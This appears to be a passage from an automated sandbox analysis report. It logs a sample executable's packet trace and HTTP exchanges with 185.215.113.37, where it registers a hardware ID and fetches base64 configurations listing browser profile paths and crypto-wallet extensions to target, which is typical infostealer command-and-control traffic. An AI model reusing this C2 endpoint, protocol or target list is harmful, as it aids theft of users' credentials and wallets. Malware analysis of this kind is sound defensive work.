Sep 26, 2024 06:00:23.961540937 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.961550951 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961568117 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961586952 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961720943 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.961733103 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.961760044 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961787939 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961833000 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.961843967 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.961863995 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961872101 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.961880922 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961905003 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.961920977 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.961926937 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961935997 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961946964 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.961956024 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961967945 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.961982012 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.961987019 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962004900 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962014914 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962022066 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962049961 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962059021 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962079048 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962090969 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962100983 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962110043 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962121010 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962131977 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962137938 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962148905 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962161064 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962161064 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962161064 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962176085 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962188005 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962196112 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962209940 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962217093 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962225914 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962241888 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962249994 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962311029 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962539911 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962560892 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962578058 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962588072 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962595940 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962610006 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962620974 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962632895 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962644100 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962651968 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962651968 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962666988 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962676048 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962683916 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962692976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962699890 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962709904 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962729931 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962739944 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962752104 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962759018 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962771893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962790012 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962795973 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962806940 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962821960 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962827921 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962835073 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962845087 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962852955 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962861061 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962876081 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962882042 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962888002 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962897062 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962905884 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962915897 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962928057 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962944984 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962950945 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962960005 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962976933 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.962982893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.962990046 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963000059 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963006973 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963017941 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963032007 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963037968 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963056087 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963062048 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963068962 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963079929 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963090897 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963099003 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963109016 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963118076 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963128090 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963135004 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963145018 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963154078 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963165998 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963172913 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963186979 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963195086 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963202953 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963213921 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963226080 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963243961 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963253021 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963263988 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963274956 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963285923 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963294029 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963304043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963315010 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:23.963323116 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963340998 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963340998 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:23.963366032 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:24.501924992 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:24.501960993 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:24.506771088 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:24.506786108 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.224256039 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.224318027 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:25.387907982 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:25.392956972 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.744626999 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.744641066 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.744652033 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.744657040 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.744735003 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:25.747917891 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:25.752652884 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.968451023 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.968507051 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.968516111 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:25.968518972 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.968561888 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:25.968630075 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.968641996 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:25.968669891 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:25.968697071 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:25.983572960 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:25.992383957 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:26.695496082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:26.697832108 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:26.733150959 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:26.737999916 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:26.952488899 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:26.952589035 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:26.953699112 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:26.958430052 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:27.658442020 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:27.658634901 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:32.124241114 CEST	49704	80	192.168.2.8	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	185.215.113.37	80	7608	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 06:00:08.431843042 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 06:00:09.120917082 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 06:00:09.123891115 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 34 43 44 37 32 45 37 38 46 39 43 32 35 34 35 34 36 36 32 37 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="hwid"D4CD72E78F9C2545466276------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="build"save------HDAFIIDAKJDGDHIDAKJJ--
Sep 26, 2024 06:00:09.357800007 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:09 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 54 51 7a 4e 6a 4a 6b 4e 32 49 30 5a 47 45 30 4d 6d 59 7a 4f 54 67 33 4e 47 5a 6c 4d 47 5a 6d 4d 6a 56 68 4e 44 68 68 4e 6d 4e 68 4e 6d 45 35 4e 57 59 33 4d 57 51 32 4f 44 4e 6a 4f 54 4e 6d 5a 47 4d 30 4d 32 4d 32 4e 7a 59 79 4f 57 4a 6c 4e 32 4d 77 4e 7a 4d 31 4d 6a 59 7a 4d 54 59 31 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MTQzNjJkN2I0ZGE0MmYzOTg3NGZlMGZmMjVhNDhhNmNhNmE5NWY3MWQ2ODNjOTNmZGM0M2M2NzYyOWJlN2MwNzM1MjYzMTY1fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
Sep 26, 2024 06:00:09.360047102 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEB Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 2d 2d 0d 0a Data Ascii: ------KECBGCGCGIEGCBFHIIEBContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------KECBGCGCGIEGCBFHIIEBContent-Disposition: form-data; name="message"browsers------KECBGCGCGIEGCBFHIIEB--
Sep 26, 2024 06:00:09.721885920 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:09 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 26, 2024 06:00:09.721903086 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 26, 2024 06:00:09.723464012 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 26, 2024 06:00:09.728013039 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIE Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="message"plugins------AFIEGCAECGCAEBFHDHIE--
Sep 26, 2024 06:00:09.954134941 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:09 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: 